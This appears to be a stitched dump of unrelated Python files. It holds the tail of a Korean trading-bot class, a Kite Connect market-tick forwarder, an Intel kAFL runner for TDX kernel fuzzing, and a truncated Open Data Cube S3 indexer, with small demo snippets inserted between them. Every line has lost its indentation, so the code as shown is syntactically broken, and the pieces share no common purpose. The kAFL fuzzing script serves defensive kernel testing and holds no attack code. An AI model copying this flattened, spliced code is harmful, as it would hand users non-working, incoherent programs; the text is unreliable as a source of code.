self._send_text_message("다시 시작해 주세요", self.main_keyboard)
else:
self._send_text_message("조회중입니다", self.main_keyboard)
return
message += self.score_query_list[self.in_progress_step]["guide"]
keyboard = self.score_query_list[self.in_progress_step]["keyboard"]
self._send_text_message(message, keyboard)
self.in_progress = self._query_score
self.in_progress_step += 1
def _query_trading_records(self, command):
"""현재까지 거래 기록을 메세지로 전송"""
del command
if self.operator is None:
self._send_text_message("자동 거래 운영중이 아닙니다", self.main_keyboard)
return
results = self.operator.get_trading_results()
if results is None or len(results) == 0:
self._send_text_message("거래 기록이 없습니다", self.main_keyboard)
return
message = []
for result in results:
message.append(f"@{result['date_time']}, {result['type']}\n")
message.append(f"{result['price']} x {result['amount']}\n")
message.append(f"총 {len(results)}건의 거래")
self._send_text_message("".join(message), self.main_keyboard)
def _terminate(self, signum=None, frame=None):
"""프로그램 종료"""
del frame
self.terminating = True
self.post_worker.stop()
if signum is not None:
print("강제 종료 신호 감지")
print("프로그램 종료 중.....")
print("Good Bye~")
kite_wbsk_mom.py
import datetime
import time
import json
from multiprocessing import Process, Queue
from queuemap import QueueMap
from threading import Thread
import pytz
import requests
from dotenv import load_dotenv, find_dotenv
from kiteconnect import KiteTicker
from kiteconnect import KiteConnect
from config import EnvConfig
from setup_logger import logger
import pandas as pd
NSE_SBIN_INSTRUMENT_TOKEN = 779521
CLOCK_FREQ = 1
TIME_IN_SEC = 0
CORR_TIME_IN_SEC = 0
# Added for the volatility
VOL_TIME_IN_SEC = 0
EPS = 3
tokens_subset=[]
enclosure_queue = Queue()
qm=QueueMap(window=30)
#Muted the URL to send data
UPDATE_TOKEN_URL = 'http://0.0.0.0:8005/kite/update_token'
TRADE_URL = 'http://localhost:8005/kite/trade'
CORR_URL = 'http://localhost:8005/kite/adjust_corr'
CORR_URL_2 = 'http://localhost:8005/kite/adjust_longterm_2'
CORR_URL_STAG = 'http://localhost:8005/kite/adjust_stag'
VOL_URL = 'http://localhost:8005/kite/adjust_volatility'
VOL_URL_3 = 'http://localhost:8005/kite/adjust_volatility_3'
VOL_URL_4 = 'http://localhost:8005/kite/adjust_volatility_4'
REV15_URL = 'http://localhost:8005/kite/adjust_reversal15'
MOM1_URL = 'http://localhost:8005/kite/adjust_mom1'
#Sending data to pnl for trade
PNL_URL = 'http://localhost:8005/kite/pnl_trade'
def downloadEnclosures(q):
"""This is the worker thread function.
It processes items in the queue one after
another. These daemon threads go into an
infinite loop, and only exit when
the main thread ends.
"""
while True:
tick = q.get()
if tick:
#print ('tick received on worker thread')
#print(tick)
analyze_data(tick)
def time_in_range(start, end, x):
"""Return true if x is in the range [start, end]"""
if start <= end:
return start <= x <= end
return start <= x or x <= end
# 0 is Monday, 4 is Friday
def is_weekday(d, start=0, end=4):
return start <= d.weekday() <= end
def on_ticks(ws, ticks):
# Callback to receive ticks.
#print('on tick initiated')
for tick in ticks:
#print(tick)
enclosure_queue.put(tick)
def analyze_data(tick):
instrument_token = tick['instrument_token']
traded_price = tick['last_price']
traded_quantity = tick['last_quantity']
volume = tick['volume']
#print("setting instrument")
qm.set(instrument_token,traded_price,traded_quantity)
priceDict=qm.check_window()
if priceDict:
priceSeries = pd.Series(priceDict)
now = datetime.datetime.now(tz)
stock_is_open = (time_in_range(TRADE_START, TRADE_END, now.time()) and
is_weekday(now))
if stock_is_open :
send_data(CORR_URL, priceSeries.iloc[0])
send_data(CORR_URL_2, priceSeries.iloc[1])
send_data(CORR_URL_STAG, priceSeries.iloc[2])
send_data(TRADE_URL, priceSeries.iloc[3])
send_data(PNL_URL, priceSeries.iloc[4])
send_data(VOL_URL, priceSeries.iloc[5])
send_data(VOL_URL_3, priceSeries.iloc[6])
send_data(VOL_URL_4, priceSeries.iloc[7])
send_data(REV15_URL, priceSeries.iloc[8])
send_data(MOM1_URL, priceSeries.iloc[9])
def send_data(url, tick):
logger.info(url,tick)
#print(requests.get(url + '?data={}'.format([traded_price])).json())
def on_connect(ws, response):
# Callback on successful connect.
print('connected')
global tokens_subset
print(len(tokens_subset))
ws.subscribe(tokens_subset)
#ws.subscribe([NSE_SBIN_INSTRUMENT_TOKEN])
print('subscribed')
ws.set_mode(ws.MODE_FULL, tokens_subset)
#ws.set_mode(ws.MODE_FULL, [NSE_SBIN_INSTRUMENT_TOKEN])
print('mode set for subscription')
def on_close(ws, code, reason):
# On connection close stop the main loop
# Reconnection will not happen after executing `ws.stop()`
ws.stop()
def on_error(ws, code, error):
logger.error(error, code)
def run_ticker(q):
resp = requests.get(UPDATE_TOKEN_URL)
access_token = json.loads(resp.text)['access_token']
# Initialise
kws = KiteTicker(conf.KITE_API_KEY, access_token)
#get list of tokens
kite = KiteConnect(api_key=conf.KITE_API_KEY)
kite.set_access_token(access_token)
print('retrieving tokens list')
data=kite.instruments()
print('list of tokens retrieved')
#retrieve instrument tokens from the instruments API response
tokens = [f['instrument_token'] for f in data]
#select only the first 3000 tokens
global tokens_subset
tokens_subset=tokens[:3000]
###############################################
# Assign the callbacks.
kws.on_ticks = on_ticks
kws.on_connect = on_connect
kws.on_close = on_close
kws.on_error = on_error
# Infinite loop on the main thread. Nothing after this will run.
# You have to use the pre-defined callbacks to manage subscriptions.
kws.connect()
q.put(0)
if __name__ == '__main__':
conf = EnvConfig()
load_dotenv(find_dotenv())
tz = pytz.timezone(conf.KITE_TIME_ZONE)
TRADE_START = conf.WEBSOCKET_KITE_START
TRADE_END = conf.WEBSOCKET_KITE_END
TIME_IN_SEC = conf.KITE_FREQUENCY * CLOCK_FREQ
CLOCK = datetime.datetime.now() - datetime.timedelta(seconds=TIME_IN_SEC)
CORR_TIME_IN_SEC = conf.CORR_CALC_FREQ
CORR_CLOCK = datetime.datetime.now() - datetime.timedelta(seconds=CORR_TIME_IN_SEC)
VOL_TIME_IN_SEC = conf.VOL_FREQUENCY
VOL_CLOCK = datetime.datetime.now() - datetime.timedelta(seconds=VOL_TIME_IN_SEC)
worker = Thread(target=downloadEnclosures, args=(enclosure_queue,))
worker.daemon = True
worker.start()
queue = Queue()
while True:
p = Process(target=run_ticker, args=(queue,))
p.start()
p.join() # this blocks until the process terminates
result = queue.get()
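time_in_range and is_weekday gate tick forwarding to market hours; a quick standalone check of that logic with example values (the 09:15-15:30 window is purely illustrative, the real bounds come from EnvConfig):

import datetime

def time_in_range(start, end, x):
    """Return True if x is in [start, end], handling ranges that wrap past midnight."""
    if start <= end:
        return start <= x <= end
    return start <= x or x <= end

def is_weekday(d, start=0, end=4):
    # 0 is Monday, 4 is Friday
    return start <= d.weekday() <= end

TRADE_START = datetime.time(9, 15)   # illustrative bounds only
TRADE_END = datetime.time(15, 30)
now = datetime.datetime(2023, 1, 2, 10, 0)  # a Monday at 10:00
print(time_in_range(TRADE_START, TRADE_END, now.time()) and is_weekday(now))  # True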
run_experiments.py
#!/usr/bin/env python3
#
# Copyright (C) 2022 Intel Corporation.
#
# This software and the related documents are Intel copyrighted materials, and your use of them is governed by the express license under which they were provided to you ("License"). Unless the License provides otherwise, you may not use, modify, copy, publish, distribute, disclose or transmit this software or the related documents without Intel's prior written permission.
# This software and the related documents are provided as is, with no express or implied warranties, other than those that are expressly stated in the License.
#
# SPDX-License-Identifier: MIT
import re
import os
import pwd
import sys
import subprocess
import time
import argparse
import tempfile
import glob
from timeit import default_timer as timer
from datetime import timedelta
from threading import Thread, Lock
import threading, queue
import multiprocessing
import yaml
FUZZ_SH_PATH = os.path.expandvars("$BKC_ROOT/bkc/kafl/fuzz.sh")
DEFAULT_TIMEOUT_HOURS=2
DEFAULT_COV_TIMEOUT_HOURS=2
REPEATS=1
SEEDS_DIR = os.path.expanduser("~/seeds/harnesses/")
#KAFL_EXTRA_FLAGS="-t 8 --t-soft 3 -tc --trace --log-crashes --kickstart 16"
KAFL_EXTRA_FLAGS="--trace --log-crashes"
HARNESS_PREFIX="CONFIG_TDX_FUZZ_HARNESS_"
KCFLAGS = "-fno-ipa-sra -fno-ipa-cp-clone -fno-ipa-cp"
#HARNESSES = ["DOINITCALLS_LEVEL_3", "DOINITCALLS_LEVEL_4", "DOINITCALLS_LEVEL_5", "DOINITCALLS_LEVEL_6", "DOINITCALLS_LEVEL_7", "CONFIG_TDX_FUZZ_HARNESS_POST_TRAP", "CONFIG_TDX_FUZZ_HARNESS_EARLYBOOT", "CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_PCI", "CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO", "CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_ACPI", "CONFIG_TDX_FUZZ_HARNESS_FULL_BOOT", "CONFIG_TDX_FUZZ_HARNESS_REST_INIT", "CONFIG_TDX_FUZZ_HARNESS_VIRTIO_BLK_PROBE", "BPH_VIRTIO_CONSOLE_INIT", "BPH_EARLY_PCI_SERIAL", "CONFIG_TDX_FUZZ_HARNESS_START_KERNEL", "CONFIG_TDX_FUZZ_HARNESS_DO_BASIC", "CONFIG_TDX_FUZZ_HARNESS_ACPI_EARLY_INIT"]
HARNESSES = [
"DOINITCALLS_LEVEL_3",
"DOINITCALLS_LEVEL_4",
"DOINITCALLS_LEVEL_5",
"DOINITCALLS_LEVEL_6",
"DOINITCALLS_LEVEL_7",
"CONFIG_TDX_FUZZ_HARNESS_POST_TRAP",
"CONFIG_TDX_FUZZ_HARNESS_EARLYBOOT",
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_PCI",
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO",
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_ACPI",
"CONFIG_TDX_FUZZ_HARNESS_FULL_BOOT",
"CONFIG_TDX_FUZZ_HARNESS_REST_INIT",
"CONFIG_TDX_FUZZ_HARNESS_VIRTIO_BLK_PROBE",
"CONFIG_TDX_FUZZ_HARNESS_START_KERNEL",
"CONFIG_TDX_FUZZ_HARNESS_DO_BASIC",
"CONFIG_TDX_FUZZ_HARNESS_ACPI_EARLY_INIT"]
#HARNESSES = ["DOINITCALLS_LEVEL_4"]
BPH_HARNESSES = [
"BPH_ACPI_INIT",
"BPH_VP_MODERN_PROBE",
"BPH_VIRTIO_CONSOLE_INIT",
"BPH_P9_VIRTIO_PROBE",
"BPH_PCI_SUBSYS_INIT",
"BPH_HANDLE_CONTROL_MESSAGE",
"BPH_VIRTIO_PCI_PROBE",
"BPH_PCIBIOS_FIXUP_IRQS"]
HARNESSES = HARNESSES + BPH_HARNESSES
HARNESS_TIMEOUT_OVERRIDES = {
"FULL_BOOT": 24,
"DOINITCALLS_LEVEL_6": 24,
"DOINITCALLS_LEVEL_4": 24,
"DO_BASIC": 24,
}
# Harnesses that run FULL_BOOT with extra kernel boot params
BOOT_PARAM_HARNESSES = {
"BPH_ACPI_INIT": "fuzzing_func_harness=acpi_init",
"BPH_VP_MODERN_PROBE": "fuzzing_func_harness=vp_modern_probe fuzzing_disallow=virtio_pci_find_capability",
"BPH_VIRTIO_CONSOLE_INIT": "fuzzing_func_harness=init",
"BPH_VIRTIO_PCI_PROBE": "fuzzing_func_harness=virtio_pci_probe",
"BPH_P9_VIRTIO_PROBE": "fuzzing_func_harness=p9_virtio_probe",
"BPH_PCI_SUBSYS_INIT": "fuzzing_func_harness=pci_subsys_init",
# TODO: kprobes not avail, do manual harness
# "BPH_EARLY_PCI_SERIAL": "fuzzing_func_harness=setup_early_printk earlyprintk=pciserial,force,00:18.1,115200",
"BPH_PCIBIOS_FIXUP_IRQS": "fuzzing_func_harness=pcibios_fixup_irqs acpi=noirq",
"BPH_HANDLE_CONTROL_MESSAGE": "fuzzing_func_harness=handle_control_message fuzzing_disallow=virtio_pci_find_capability,pci_read_config_dword",
#"FULL_BOOT": "tsc_early_khz=2600",
}
KAFL_PARAM_HARNESSES = {
"FULL_BOOT": "-t 8 -ts 3"
}
DISABLE_HARNESSES = []
command_log = []
"""
# SET these in .config.tmpl
default_config_options = {"CONFIG_TDX_FUZZ_KAFL_DETERMINISTIC": "y",
"CONFIG_TDX_FUZZ_KAFL_DISABLE_CPUID_FUZZ": "y",
"CONFIG_TDX_FUZZ_KAFL_SKIP_IOAPIC_READS": "n",
"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "n",
"CONFIG_TDX_FUZZ_KAFL_SKIP_RNG_SEEDING": "y",
"CONFIG_TDX_FUZZ_KAFL_SKIP_MSR": "n",
"CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "n",
}
"""
harness_config_options = {
"CONFIG_TDX_FUZZ_HARNESS_EARLYBOOT": {"CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "n"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS": {"CONFIG_TDX_FUZZ_KAFL_SKIP_IOAPIC_READS": "y", "CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_FULL_BOOT": {"CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "y"},
"CONFIG_TDX_FUZZ_HARNESS_POST_TRAP": {"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y", "CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "y"},
"DOINITCALLS_LEVEL_7": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"DOINITCALLS_LEVEL_6": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"BPH_VIRTIO_CONSOLE_INIT": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_PCI": {"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_START_KERNEL": {"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y"},
}
config_options_dependencies = {}
kernel_build_mutex = Lock()
q = queue.Queue()
"""
Strips the CONFIG_TDX_FUZZ_HARNESS_ prefix from the harness name
"""
def normalize_harness_name(s):
return s[len(HARNESS_PREFIX):] if s.startswith(HARNESS_PREFIX) else s
def linux_conf_harness_name(s):
return HARNESS_PREFIX + normalize_harness_name(s)
def name_to_harness(s):
s = s.split("-")[0] # Remove -tmpXXX
if s.startswith("BPH_"):
return s
elif s.startswith("DOINITCALLS_LEVEL_"):
return s
return HARNESS_PREFIX + s
def get_kafl_config_boot_params():
conf_file = os.environ.get("KAFL_CONFIG_FILE")
with open(conf_file) as conf_yaml_file:
conf = yaml.load(conf_yaml_file, Loader=yaml.FullLoader)
default_append = conf.get("qemu_append", "")
return default_append
def get_work_parallelism():
with open(FUZZ_SH_PATH, "r") as fh:
d = fh.read()
matches = re.finditer("KAFL_FULL_OPTS=.*-p\s*(\d+).*", d)
for m in matches:
return int(m.group(1))
def parse_linux_config(fname):
return HARNESSES
"""
harnesses = []
with open(fname, "r") as fh:
config_data = fh.read()
harness_re = re.finditer("CONFIG_TDX_FUZZ_HARNESS_[^=\s]+", config_data)
for m in harness_re:
harness = m.group(0)
if harness in DISABLE_HARNESSES:
continue
harnesses.append(harness)
return harnesses
"""
def generate_setups(harnesses):
setups = set()
for harness in harnesses:
req_conf = ((harness, "y"),)
harness_options = harness_config_options.get(harness, None)
if harness_options:
req_conf = req_conf + tuple(harness_options.items())
if harness.startswith("DOINITCALLS_LEVEL"):
level = harness[len("DOINITCALLS_LEVEL_"):]
req_conf = req_conf + (("CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS", "y"), ("CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_LEVEL", level),)
if harness.startswith("BPH_"):
req_conf = req_conf + (("CONFIG_TDX_FUZZ_HARNESS_NONE", "y"),)
setups.add(req_conf)
return setups
def build_kernel(setup, linux_source, global_storage_dir, debug=False):
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if debug:
out_stdout = None
out_stderr = None
harness = normalize_harness_name(setup[0][0])
storage_dir = tempfile.mkdtemp(dir=global_storage_dir, prefix=harness+"-")
campaign_name = os.path.basename(storage_dir)
print(f"Configuring kernel for campaign '{campaign_name}'")
old_cwd = os.getcwd()
# Enter Linux CWD
os.chdir(linux_source)
kernel_build_mutex.acquire()
subprocess.run(f"cp .config.tmpl .config", shell=True, stdout=out_stdout, stderr=out_stderr)
print(f"Generating config for {setup}")
for conf,val in setup:
if val is None:
# Handle after all values have been set
pass
else:
subprocess.run(f"./scripts/config --set-val {conf} {val}", shell=True, stdout=out_stdout, stderr=out_stderr)
# Unsets need to happen after setting vals
for conf,val in setup:
if val is None:
subprocess.run(f"./scripts/config -d {conf}", shell=True, stdout=out_stdout, stderr=out_stderr)
print("Building kernel")
kernel_build_path = os.path.join(storage_dir, "build")
os.makedirs(kernel_build_path, exist_ok=True)
subprocess.run(f"make -j $(nproc) KCFLAGS=\"{KCFLAGS}\"", shell=True, stdout=out_stdout, stderr=out_stderr)
#subprocess.run(f"make -j $(nproc)", shell=True, stdout=out_stdout, stderr=out_stderr)
time.sleep(1)
# Copy over built kernel to own directory
subprocess.run(f"cp vmlinux System.map arch/x86/boot/bzImage .config {kernel_build_path}", shell=True, stdout=out_stdout, stderr=out_stderr)
kernel_build_mutex.release()
print(f"Copied kernel for campaign '{campaign_name}' to {kernel_build_path}")
# Reset CWD
os.chdir(old_cwd)
return campaign_name
def run_setup(campaign_name, setup, linux_source, global_storage_dir, debug=False, cpu_offset=0, dry_run=False):
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if debug:
out_stdout = None
out_stderr = None
harness = normalize_harness_name(setup[0][0])
print(f"Preparing campaign '{campaign_name}'")
#campaign_name = time.strftime("%Y%m%d-%H%M%S")
storage_dir = os.path.join(global_storage_dir, campaign_name)
username = pwd.getpwuid(os.getuid()).pw_name
workdir_path = f"/dev/shm/{username}_tdfl-{campaign_name}"
kernel_build_path = os.path.join(storage_dir, "build")
old_cwd = os.getcwd()
# Get default seeds for harness
seeds_dir = None
harness_seeds = os.path.join(SEEDS_DIR, harness)
if os.path.exists(harness_seeds):
seeds_dir = harness_seeds
else:
print(f"Could not find seed dir {harness_seeds}")
seed_str = f"--seed-dir {seeds_dir}" if seeds_dir else ""
print(f"Running campaign {workdir_path} with seeds '{seeds_dir}'")
dry_run_flags = "--abort-exec=10000" if dry_run else ""
timeout = HARNESS_TIMEOUT_OVERRIDES.get(harness, DEFAULT_TIMEOUT_HOURS)
kafl_config_boot_params = get_kafl_config_boot_params()
kernel_boot_params = kafl_config_boot_params + " " + BOOT_PARAM_HARNESSES.get(harness, "")
if len(kernel_boot_params) > 0:
kernel_boot_params = f"--append=\'{kernel_boot_params}\'"
kafl_harness_extra_params = KAFL_PARAM_HARNESSES.get(harness, "")
try:
exc_cmd = f"KAFL_WORKDIR={workdir_path} {FUZZ_SH_PATH} full {kernel_build_path} --abort-time={timeout} --cpu-offset={cpu_offset} {seed_str} {KAFL_EXTRA_FLAGS} {kafl_harness_extra_params} {dry_run_flags} {kernel_boot_params}"
command_log.append(exc_cmd)
#with open(os.path.join(workdir_path, "cmd"), "w") as f:
# print(exc_cmd, file=f)
subprocess.run(exc_cmd, shell=True, timeout=timeout * 3600 + 60, stdout=out_stdout, stderr=out_stderr)
except subprocess.TimeoutExpired as e:
print(e)
# Wait for stuff to settle down... might not be necessary
print(f"Done running campaign {workdir_path}")
time.sleep(2)
subprocess.run(f"{FUZZ_SH_PATH} ranges {workdir_path} > {workdir_path}/pt_ranges.txt", shell=True, stdout=out_stdout, stderr=out_stderr)
subprocess.run(f"mv {workdir_path}/* {storage_dir}", shell=True, stdout=out_stdout, stderr=out_stderr)
subprocess.run(f"rm -r {workdir_path}", shell=True, stdout=out_stdout, stderr=out_stderr)
target_dir = os.path.join(storage_dir, "target")
if not os.path.isdir(target_dir):
print(f"Could not find ./target/ in '{storage_dir}'. Something most likely went wrong. Doing a manual copy.")
os.makedirs(target_dir, exist_ok=True)
## HACK: overwrite ./target/ copied by fuzz.sh since vmlinux could have changed due to parallel campaign compilation
#subprocess.run(f"cp {kernel_build_path}/* {target_dir}", shell=True, stdout=out_stdout, stderr=out_stderr)
def worker(i, work_parallelism, stop, dry_run):
cpu_offset = i*work_parallelism
print(f"Starting worker thread {i} with cpu-offset {cpu_offset} (work_parallelism={work_parallelism})")
while True:
try:
work_args = q.get(timeout=1)
run_setup(*work_args, cpu_offset=cpu_offset, dry_run=dry_run)
q.task_done()
except queue.Empty:
if stop():
break
def do_cov(args):
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if args.debug:
out_stdout = None
out_stderr = None
for d in glob.glob(args.storage_dir + "/*/"):
exp_name = os.path.basename(os.path.normpath(d))
harness = normalize_harness_name(name_to_harness(exp_name))
if harness in args.skip_harness:
continue
# Skip coverage gathering for campaigns that already have linecov.lst
if (not args.rerun) and os.path.exists(os.path.join(d, "traces/linecov.lst")):
continue
ncpu = args.work_parallelism * args.p
kafl_config_boot_params = get_kafl_config_boot_params()
kernel_boot_params = kafl_config_boot_params + " " + BOOT_PARAM_HARNESSES.get(harness, "")
if len(kernel_boot_params) > 0:
kernel_boot_params = f"--append=\'{kernel_boot_params}\'"
cmd_cov = f"{FUZZ_SH_PATH} cov {d} -p {ncpu} {kernel_boot_params}"
cmd_smatch = f"USE_GHIDRA=1 {FUZZ_SH_PATH} smatch {d}"
print(f"Gathering coverage for '{d}' with -p {ncpu}")
subprocess.run(cmd_cov, shell=True, stdout=out_stdout, stderr=out_stderr)
subprocess.run(cmd_smatch, shell=True, stdout=out_stdout, stderr=out_stderr)
#print(cmd_cov)
#print(cmd_smatch)
print(f"DONE Gathering coverage for '{d}' with -p {ncpu}\n")
def do_run(args):
linux_src = args.linux_src
storage_dir = args.storage_dir
if not args.allow_existing_dir and os.path.isdir(storage_dir):
print(f"Storage path '{storage_dir}' already exists. Please choose a new dir.")
sys.exit(1)
os.makedirs(storage_dir, exist_ok=True)
linux_config_path = os.path.join(linux_src, ".config")
linux_config_tmpl_path = os.path.join(linux_src, ".config.tmpl")
linux_config_bak_path = os.path.join(linux_src, ".config.fuzz.bak")
print(f"Backing up .config to {linux_config_bak_path}")
subprocess.run(f"cp {linux_config_path} {linux_config_bak_path}", shell=True)
if os.path.isfile(linux_config_tmpl_path):
print(f"Using Kernel config template '{linux_config_tmpl_path}'")
else:
print(f"Kernel .config template file '{linux_config_tmpl_path}' does not exists, using ' {linux_config_path}'")
subprocess.run(f"cp {linux_config_path} {linux_config_tmpl_path}", shell=True)
harnesses = parse_linux_config(linux_config_path)
setups = generate_setups(harnesses)
print("Campaign will run {} different setups".format(len(setups)))
# Start up workers
work_parallelism = args.work_parallelism
if args.overcommit is False and work_parallelism * args.p > multiprocessing.cpu_count():
print(f"Using more parallelism than cores available ({work_parallelism} * {args.p} > {multiprocessing.cpu_count()})!! If you really want this, specify --overcommit")
sys.exit(1)
start = timer()
for setup in setups:
#run_setup(setup, linux_src, storage_dir, debug=args.debug)
for i in range(REPEATS):
# TODO: no need to build separate kernels for repeats. Needs refactoring
campaign_name = build_kernel(setup, linux_src, storage_dir, debug=True)
q.put((campaign_name, setup, linux_src, storage_dir, args.debug))
threads = []
# Condition variable. No need for it to be atomic..
stop_threads = False
for i in range(args.p):
t = threading.Thread(target=worker, args=(i, work_parallelism, lambda: stop_threads, args.dry_run))
threads.append(t)
t.start()
subprocess.run(f"mv {linux_config_bak_path} {linux_config_path}", shell=True)
# block until all campaigns are done
q.join()
end = timer()
print("Campaign ran {} different setups in {}".format(len(setups), (timedelta(seconds=end-start))))
stop_threads = True
for t in threads:
t.join()
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if args.debug:
out_stdout = None
out_stderr = None
print("Command log:")
for cmd in command_log:
print(cmd)
print("END command log")
if args.coverage:
for d in glob.glob(storage_dir + "/*"):
ncpu = work_parallelism * args.p
#ncpu = args.p
harness = name_to_harness(d)
if harness in args.skip_harness:
continue
kernel_boot_params = BOOT_PARAM_HARNESSES.get(harness, "")
if len(kernel_boot_params) > 0:
kernel_boot_params = f"--append=\'{kernel_boot_params}\'"
cmd_cov = f"{FUZZ_SH_PATH} cov {d} -p {ncpu} {kernel_boot_params}"
cmd_smatch = f"USE_GHIDRA=1 {FUZZ_SH_PATH} smatch {d}"
print(f"Gathering coverage for '{d}' with -p {ncpu}")
try:
subprocess.run(cmd_cov, shell=True, stdout=out_stdout, stderr=out_stderr, timeout=DEFAULT_COV_TIMEOUT_HOURS*3600)
subprocess.run(cmd_smatch, shell=True, stdout=out_stdout, stderr=out_stderr, timeout=DEFAULT_COV_TIMEOUT_HOURS*3600)
except subprocess.TimeoutExpired as e:
print(f"TIMEOUT while getting coverage for '{d}'")
print(f"DONE Gathering coverage for '{d}' with -p {ncpu}")
def parse_args():
def parse_as_path(pathname):
return os.path.abspath(
os.path.expanduser(
os.path.expandvars(pathname)))
def parse_as_file(filename):
expanded = parse_as_path(filename)
if not os.path.exists(expanded):
raise argparse.ArgumentTypeError("Failed to find file argument %s (expanded: %s)" % (filename, expanded))
return expanded
def parse_as_dir(dirname):
expanded = parse_as_path(dirname)
if not os.path.exists(expanded):
raise argparse.ArgumentTypeError("Failed to find directory argument %s (expanded: %s)" % (dirname, expanded))
return expanded
main_parser = argparse.ArgumentParser(description='kAFL TDX fuzzing experiments runner.')
subparsers = main_parser.add_subparsers(dest='action', metavar='<action>', required=True)
cov_parser = subparsers.add_parser("cov", help="collect coverage")
run_parser = subparsers.add_parser("run", help="run campaigns")
cov_parser.add_argument('storage_dir', metavar='<storage_dir>', type=str,
help='target dir containing the results of prior fuzzing run')
cov_parser.add_argument('--rerun', action="store_true",
help='Force rerun of coverage gathering')
run_parser.add_argument('linux_src', metavar='<linux_src>', type=parse_as_dir,
help='path to your linux kernel tree')
run_parser.add_argument('storage_dir', metavar='<storage_dir>', type=parse_as_path,
help='target dir to store the results. will be created / must not exist.')
run_parser.add_argument('--allow-existing-dir', action="store_true",
help='Allow storing results in existing dir')
run_parser.add_argument('--dry-run', action="store_true",
help='Perform dry run')
run_parser.add_argument('-c', '--coverage', action="store_true",
help='Gather coverage + smatch after running campaigns')
run_parser.add_argument('--launcher', type=parse_as_file, default="$BKC_ROOT/bkc/kafl/fuzz.sh",
help='fuzzer launch script (default: $BKC_ROOT/bkc/kafl/fuzz.sh)')
main_parser.add_argument('--debug', action='store_true',
help='Turn on debug output (show fuzzer stdout/stderr)')
main_parser.add_argument('-p', metavar='<n>', type=int, default=1,
help='Parallelize workload')
main_parser.add_argument('--work_parallelism', metavar='<n>', type=int, default=get_work_parallelism(),
help='Parallelism used by fuzzer. Only use for manual override, automatically obtained from fuzz.sh')
main_parser.add_argument('--overcommit', type=bool, default=False,
help='Overcommit parallelization')
main_parser.add_argument('--skip-harness', nargs="*", type=str, default=[],
help='Skip processing for specified harnesses')
return main_parser.parse_args()
def main():
args = parse_args()
if not os.path.exists(FUZZ_SH_PATH):
print("Could not find kAFL launcher in %s. Exit" % FUZZ_SH_PATH)
return
if not "KAFL_CONFIG_FILE" in os.environ:
print("KAFL_CONFIG_FILE not in environment. Have you setup the right kAFL environment (make env)?")
sys.exit(1)
if args.action == "cov":
do_cov(args)
if args.action == "run":
do_run(args)
if __name__ == "__main__":
main()
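get_work_parallelism scrapes the -p value out of the KAFL_FULL_OPTS line in fuzz.sh; a standalone sketch of that regex against a made-up sample line:

import re

sample_fuzz_sh = 'KAFL_FULL_OPTS="--redqueen --grimoire -p 16"\n'  # contents invented for illustration

def get_work_parallelism_from(text):
    # Same pattern as get_work_parallelism(): take the first -p <n> on the KAFL_FULL_OPTS line.
    for m in re.finditer(r"KAFL_FULL_OPTS=.*-p\s*(\d+).*", text):
        return int(m.group(1))
    return None

print(get_work_parallelism_from(sample_fuzz_sh))  # 16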
autoIndex.py
#!/usr/bin/env python3
import json
import logging
from multiprocessing import Manager, Process, cpu_count, current_process
from queue import Empty
from urllib.parse import urlparse
import boto3
import click
import datacube
from botocore import UNSIGNED
from botocore.config import Config
from ls_public_bucket import (_parse_group, add_dataset, get_s3_url,
make_metadata_doc)
from satsearch import Search
import traceback as tb
STOP_SIGN = "ALL_COMPLETE_END_WORKER"
logger = logging.getLogger('odcindexer')
def stac_search(extent, start_date, end_date):
""" Convert lat, lon to pathrows """
logger.info("Querying STAC for area: {} and times: {} - {} (UTC)".format(extent, start_date, end_date))
srch = Search(
bbox=extent,
time='{}T00:00:00Z/{}T23:59:59Z'.format(start_date, end_date),
url="https://sat-api.developmentseed.org/stac/search"
)
try:
logger.info("Found {} items".format(srch.found()))
return srch
except KeyError as e:
tb.print_exc()
return None
def index_dataset(index, s3, url, parse_only):
logger.info("Downloading {}".format(url))
bucket_name, key = parse_s3_url(url)
obj = s3.Object(bucket_name, key).get()
raw = obj['Body'].read()
raw_string = raw.decode('utf8')
logger.info("Parsing {}".format(key))
try:
txt_doc = _parse_group(iter(raw_string.split("\n")))['L1_METADATA_FILE']
data = make_metadata_doc(txt_doc, bucket_name, key)
except Exception as e:
logger.error("Metadata parsing error: {}; {}".format(e.__class__.__name__, e))
return
uri = get_s3_url(bucket_name, key)
if parse_only:
logger.info("Skipping indexing step")
else:
logger.info("Indexing {}".format(key))
add_dataset(data, uri, index, "verify")
def index_datasets(items, parse_only=False):
s3 = boto3.resource("s3", config=Config(signature_version=UNSIGNED))
dc = datacube.Datacube()
idx = dc.index
for item in items:
